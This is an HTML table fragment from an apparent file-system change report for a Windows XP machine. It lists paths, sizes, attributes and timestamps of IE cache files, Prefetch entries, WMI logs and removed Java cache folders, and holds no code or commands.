<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\PrivacIE\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">115KB</span></td>
<td><span style="color: black; font-size: xx-small;">115KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:43 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:34 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Start Menu\Programs\Windows Media Player.lnk</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:50:09 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:46 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Start Menu\Programs\Accessories\Entertainment\Windows Media Player.lnk</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:50:09 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:46 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\NetworkService\Cookies\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">17KB</span></td>
<td><span style="color: black; font-size: xx-small;">17KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:48:42 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:24:04 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">17KB</span></td>
<td><span style="color: black; font-size: xx-small;">17KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:48:42 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:24:04 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:48:42 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:24:04 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\wmsetup.log</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:50:09 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:46 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\CMD.EXE-087B4001.pf</span></td>
<td><span style="color: black; font-size: xx-small;">14KB</span></td>
<td><span style="color: black; font-size: xx-small;">15KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:18:35 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:32 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\CSRSS.EXE-12B63473.pf</span></td>
<td><span style="color: black; font-size: xx-small;">25KB</span></td>
<td><span style="color: black; font-size: xx-small;">25KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:26:54 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:23 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\IEXPLORE.EXE-27122324.pf</span></td>
<td><span style="color: black; font-size: xx-small;">113KB</span></td>
<td><span style="color: black; font-size: xx-small;">123KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:49 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:43 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\JAVAW.EXE-2DC32ABC.pf</span></td>
<td><span style="color: black; font-size: xx-small;">50KB</span></td>
<td><span style="color: black; font-size: xx-small;">107KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:58:50 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:06 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\NET.EXE-01A53C2F.pf</span></td>
<td><span style="color: black; font-size: xx-small;">14KB</span></td>
<td><span style="color: black; font-size: xx-small;">18KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:18:30 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\NET1.EXE-029B9DB4.pf</span></td>
<td><span style="color: black; font-size: xx-small;">15KB</span></td>
<td><span style="color: black; font-size: xx-small;">19KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:18:30 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\REGSVR32.EXE-25EEFE2F.pf</span></td>
<td><span style="color: black; font-size: xx-small;">60KB</span></td>
<td><span style="color: black; font-size: xx-small;">61KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:50:16 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:07 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\TASKMGR.EXE-20256C55.pf</span></td>
<td><span style="color: black; font-size: xx-small;">19KB</span></td>
<td><span style="color: black; font-size: xx-small;">21KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:07:22 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:46 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\UNREGMP2.EXE-07CACB61.pf</span></td>
<td><span style="color: black; font-size: xx-small;">26KB</span></td>
<td><span style="color: black; font-size: xx-small;">39KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:50:09 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:46 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\VERCLSID.EXE-3667BD89.pf</span></td>
<td><span style="color: black; font-size: xx-small;">20KB</span></td>
<td><span style="color: black; font-size: xx-small;">21KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:26:26 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:46 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\WINLOGON.EXE-32C57D49.pf</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:26:54 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:24 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\CatRoot2\edb.chk</span></td>
<td><span style="color: black; font-size: xx-small;">9KB</span></td>
<td><span style="color: black; font-size: xx-small;">9KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:26:41 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:41 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb</span></td>
<td><span style="color: black; font-size: xx-small;">3,154KB</span></td>
<td><span style="color: black; font-size: xx-small;">3,154KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:26:13 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:13 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\config\system.LOG</span></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td><span style="color: black; font-size: xx-small;">HA</span></td>
<td><span style="color: black; font-size: xx-small;">HA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:26:22 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:33 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\wbem\Logs\wbemcore.log</span></td>
<td><span style="color: black; font-size: xx-small;">38KB</span></td>
<td><span style="color: black; font-size: xx-small;">38KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:21:49 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:35 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\wbem\Logs\wbemess.log</span></td>
<td><span style="color: black; font-size: xx-small;">3KB</span></td>
<td><span style="color: black; font-size: xx-small;">4KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:25:07 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\wbem\Logs\wbemprox.log</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:49:59 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:35 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\wbem\Logs\wmiprov.log</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:55:29 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:16 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\GVNZ58AI.txt</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:06:45 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\J695B3FR.txt</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:05:35 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\JTYOEQBQ.txt</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:44 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{E4F1361D-04D0-11E2-A16B-08002765500A}.dat</span></td>
<td><span style="color: black; font-size: xx-small;">5KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:23:34 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{E4F1361F-04D0-11E2-A16B-08002765500A}.dat</span></td>
<td><span style="color: black; font-size: xx-small;">52KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:17:00 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\urlquery_net[1].htm</span></td>
<td><span style="color: black; font-size: xx-small;">41KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:05:12 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\google_com[1].htm</span></td>
<td><span style="color: black; font-size: xx-small;">108KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:53 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\qsonhs[2].aspx</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:45 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\redir_not_found[1].htm</span></td>
<td><span style="color: black; font-size: xx-small;">6KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:05:35 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\System Volume Information</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\16</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\17</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\18</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\19</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\2</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\20</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\21</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\22</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\23</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\24</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\25</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\26</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\27</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\28</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\29</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\3</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\30</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\31</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\32</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\6c34baa0-5fe37a94</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:18 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\6c34baa0-5fe37a94.idx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:18 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\33</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\34</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\35</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\36</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\37</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
